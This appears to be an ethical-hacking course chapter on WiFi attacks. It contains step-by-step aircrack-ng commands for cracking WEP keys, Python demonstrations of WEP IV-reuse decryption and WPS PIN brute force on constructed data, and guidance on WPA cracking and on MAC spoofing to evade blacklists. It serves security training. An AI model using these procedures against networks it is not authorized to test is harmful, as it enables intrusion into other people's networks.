[ Certified Ethical Hacker v10 ] :: [ Chapter 7 ] :: WiFi Hacking
WiFi Basics
SSID: the human-readable name of the network
BSSID: the MAC address of the access point
ESSID: the name of a network that spans multiple access points
IVs: initialization vectors. In WEP every frame carries a 24-bit IV in the clear; it is prepended to the shared WEP key to form the per-frame RC4 key, so the key material for each frame differs only in those 24 bits. With just 2^24 possible IVs (some of them cryptographically weak) a busy network repeats them quickly, and that repetition is what the aircrack-ng statistical attacks exploit.
PWR (as listed in airodump-ng) is received signal strength in dBm, a negative number. "Lower is better" means closer to zero: -40 dBm is a stronger signal than -90 dBm, even though -90 is numerically lower.
Alfa Networks wireless adapter – Usually just called an "Alfa card," this is a high-powered USB-attached wifi adapter whose chipset supports monitor mode and packet injection, which is what makes capture, MITM and evil-twin hotspot attacks much easier.
WEP Cracking
WEP cracking is almost a useless skill to practice, because there are very few WEP-enabled access points in the wild today. Except that:
- WEP cracking is a great way to learn the aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng), which will definitely deepen your understanding of wifi.
- If you actually find a WEP access point you'll be able to exploit it. (People forget to update things all the time.)
https://www.youtube.com/watch?v=RydsjNhUjdg
Note the commands (substitute your own interface name if it is not wlan0; on older systems the monitor interface is called mon0 rather than wlan0mon):

```shell
# list wireless NICs and their drivers:
airmon-ng

# put the card into monitor mode:
airmon-ng start wlan0

# airmon-ng reports processes that will interfere; kill them
# (repeat as necessary, or run "airmon-ng check kill" to do it in one step):
kill <process_ID>

# find nearby wifi networks; note the BSSID and channel of the target:
airodump-ng wlan0mon

# lock on to that network and write captured frames to a file:
airodump-ng -c <channel> -w <output_file> --bssid <target_bssid> wlan0mon

# in a new window, fake-authenticate with the access point so it accepts our frames
# (-1 is fake authentication; the 0 is the reassociation delay in seconds):
aireplay-ng -1 0 -a <target_bssid> wlan0mon

# now replay captured ARP requests so the AP generates fresh IVs
# (-3 is the ARP request replay attack):
aireplay-ng -3 -b <target_bssid> wlan0mon

# watch the #Data column in the airodump-ng window: you need roughly 15k IVs
# for a 64-bit key, considerably more for a 128-bit key

# in another terminal, find the capture file (<output_file>-01.cap) and crack it:
ls
aircrack-ng <output_file>-01.cap
# aircrack-ng re-runs automatically as IVs accumulate; the key is printed
# in hex, e.g. 01:02:03:04:05

# once you have the key, stop aireplay-ng (Ctrl-C), take the card out of
# monitor mode and restart the services you killed above:
airmon-ng stop wlan0mon
service networking start
service network-manager start   # or: systemctl start NetworkManager
```

Now open the GUI Network Manager (on the top right in Kali), select the target network, and enter the hex key you got above. Leave out the colons.
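The IV definition above and the "generate IVs, then crack" procedure both rest on the same weakness, so here is one worked example for both. This is an added example, not code from the page or from the aircrack-ng project: it implements WEP's actual construction (RC4 keyed with IV || key, CRC-32 ICV, IV sent in the clear) and shows that once an IV repeats, a single known plaintext (ARP is fixed-format, which is why aireplay-ng replays ARP) exposes every other frame under that IV without the key ever being learned. aircrack-ng's PTW attack is a statistical attack on the key itself and needs many distinct IVs; this shows the simpler underlying flaw. The key, the IV and both payloads are constructed.

```python
"""WEP per-frame key = (24-bit IV || shared key) fed to RC4, IV sent in the clear.
Constructed example: key, IV and payloads below are made up."""
import math
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA + PRGA), exactly as WEP uses it."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _icv(payload: bytes) -> bytes:
    # WEP integrity check value: CRC-32 of the plaintext, little-endian
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Return IV || RC4_{IV||key}(payload || ICV), i.e. the WEP frame body."""
    assert len(iv) == 3, "WEP IVs are 24 bits"
    plaintext = payload + _icv(payload)
    ks = rc4_keystream(iv + key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def wep_decrypt(key: bytes, frame: bytes) -> tuple:
    """Legitimate receiver: returns (payload, icv_ok)."""
    iv, body = frame[:3], frame[3:]
    ks = rc4_keystream(iv + key, len(body))
    plaintext = bytes(c ^ k for c, k in zip(body, ks))
    payload, icv = plaintext[:-4], plaintext[-4:]
    return payload, _icv(payload) == icv


def keystream_from_known_plaintext(frame: bytes, known_payload: bytes) -> tuple:
    """Attacker: ciphertext XOR known plaintext = keystream for this IV. No key needed."""
    iv, body = frame[:3], frame[3:]
    plaintext = known_payload + _icv(known_payload)
    return iv, bytes(c ^ p for c, p in zip(body, plaintext))


def decrypt_with_keystream(frame: bytes, iv: bytes, ks: bytes) -> bytes:
    """Attacker: decrypt any other frame that reused the same IV."""
    assert frame[:3] == iv, "keystream is only valid for the IV it was recovered under"
    body = frame[3:]
    assert len(body) <= len(ks), "known plaintext must be at least as long as the target"
    return bytes(c ^ k for c, k in zip(body, ks))[:-4]


def frames_until_iv_collision(p: float = 0.5) -> int:
    """Birthday bound: frames with random 24-bit IVs before the probability of
    at least one repeated IV reaches p (about 4.8k frames for p = 0.5)."""
    n = 2 ** 24
    return math.ceil(math.sqrt(2 * n * math.log(1 / (1 - p))))


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")            # constructed 40-bit WEP key
    iv = bytes.fromhex("0a0b0c")                  # constructed IV
    arp = b"ARP_REQUEST_who-has_192.168.1.1?_tell_192.168.1.50__padding__"
    secret = b"POST /login user=admin&pass=hunter2"
    f_arp = wep_encrypt(key, iv, arp)
    f_secret = wep_encrypt(key, iv, secret)       # IV reused -> same keystream
    iv_, ks = keystream_from_known_plaintext(f_arp, arp)
    print(decrypt_with_keystream(f_secret, iv_, ks))
    print("frames for a 50% chance of an IV repeat:", frames_until_iv_collision())
```

The ICV is a CRC, not a MAC, so it does not help the receiver here: the attacker never modifies a frame, only reads it. The birthday figure is why a few thousand captured frames on a busy AP already contain repeated IVs, and why injection (aireplay-ng -3) is used to reach the tens of thousands of IVs the statistical key-recovery attack wants.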
WEP Cracking with Gerix (an old GUI tool) for comparison
Meet Network Chuck: Hacking Public WiFi
YouTuber and pro instructor. You need to subscribe to his channel. Here's a demo of hacking public WiFi with a Raspberry Pi and Kali:
Cracking WPA & WPA2 with Aircrack-ng on Kali Linux
https://www.youtube.com/watch?v=4DjyEnPH2bY
WPS Hacking with Reaver and Wash
WPS is awful. The WPS PIN is 8 digits, but the eighth digit is a checksum of the other seven, and the access point confirms the first and second halves of the PIN separately, so an attacker needs at most 10,000 + 1,000 = 11,000 guesses instead of 10^7. Reaver runs that brute force online (typically hours rather than instantly; the offline Pixie Dust attack, reaver -K, against weak chipsets can finish in seconds) and the AP then hands back the WPA/WPA2 passphrase. Wash scans for WPS-enabled access points and shows whether WPS is locked.
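Why 11,000 guesses rather than ten million, as an added example (not code from the page or from the Reaver project): the WPS checksum-digit calculation below is the one the specification defines, the "access point" is a simulated oracle that only reports whether the first half, then the whole PIN, was right (the M4/M6 NACK behaviour Reaver abuses), and the secret PIN is constructed. Real Reaver does the same search over the air and is slowed by the AP's response time and lockouts, not by the size of the search.

```python
"""Constructed example of the WPS PIN search. The oracle stands in for a real
WPS registrar; the secret PIN used in __main__ is made up."""


def wps_checksum(pin7: int) -> int:
    """Checksum digit for a 7-digit WPS PIN body (the WPS-specified algorithm)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True if the 8th digit is the correct checksum of the first seven."""
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


def search_space() -> tuple:
    """(guesses with the half-by-half leak, guesses if the PIN were checked as a whole)."""
    return 10 ** 4 + 10 ** 3, 10 ** 7


def make_simulated_ap(secret_pin: str):
    """Oracle(pin) -> (first_half_ok, pin_ok): mimics an AP that NACKs after M4
    when the first four digits are wrong and after M6 when the rest is wrong."""
    assert is_valid_wps_pin(secret_pin)

    def oracle(pin: str) -> tuple:
        return pin[:4] == secret_pin[:4], pin == secret_pin

    return oracle


def reaver_style_bruteforce(oracle) -> tuple:
    """Recover the PIN half by half; returns (pin or None, number of guesses)."""
    guesses = 0
    first = None
    for h1 in range(10 ** 4):                      # phase 1: first half, 10^4 max
        body = f"{h1:04d}000"                       # second half is irrelevant here
        guesses += 1
        if oracle(body + str(wps_checksum(int(body))))[0]:
            first = f"{h1:04d}"
            break
    if first is None:
        return None, guesses
    for h2 in range(10 ** 3):                      # phase 2: 3 digits + checksum, 10^3 max
        body = f"{first}{h2:03d}"
        pin = body + str(wps_checksum(int(body)))
        guesses += 1
        if oracle(pin)[1]:
            return pin, guesses
    return None, guesses


if __name__ == "__main__":
    ap = make_simulated_ap("12345670")             # constructed secret PIN
    print(reaver_style_bruteforce(ap))             # -> ('12345670', 1803)
    print("search space with leak vs. without:", search_space())
```

The checksum digit is also why a PIN such as 12345678 is never even tried: only one in ten 8-digit strings is a valid PIN, which is where the 10^7 "whole PIN" figure comes from.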
Hacking WPA with WiFite
From our friend at JackkTutorials:
https://www.youtube.com/watch?v=nYcVoM79ywk
From another good channel, HakTools:
https://www.youtube.com/watch?v=k3RoC5C7CEc
Oops! You've been shunned! How do you get back onto WiFi?
An access point that blacklists or filters clients does it by MAC address, so change yours: you need to be aware of the macchanger command.
https://linuxconfig.org/how-to-change-mac-address-using-macchanger-on-kali-linux
Finding Rogue APs: inSSIDer
Exercises
- Cracking WEP with Kali. Follow this process against the access point I will provide.
- Cracking WPA via WPS. Follow the process of finding a WPS-enabled AP with Wash and recovering its PIN (and the WPA passphrase) with Reaver.
- Cracking WPA2. Follow the example using Wifite.
Bluetooth
Know the terminology:
Bluejacking: sending unsolicited messages (typically business-card/OBEX pushes) to nearby Bluetooth devices
Bluesnarfing: unauthorized access to data (contacts, calendar, files) on a Bluetooth device
Blueprinting: fingerprinting a Bluetooth device's make, model and firmware from its address prefix and SDP service records
Bluetooth bazooka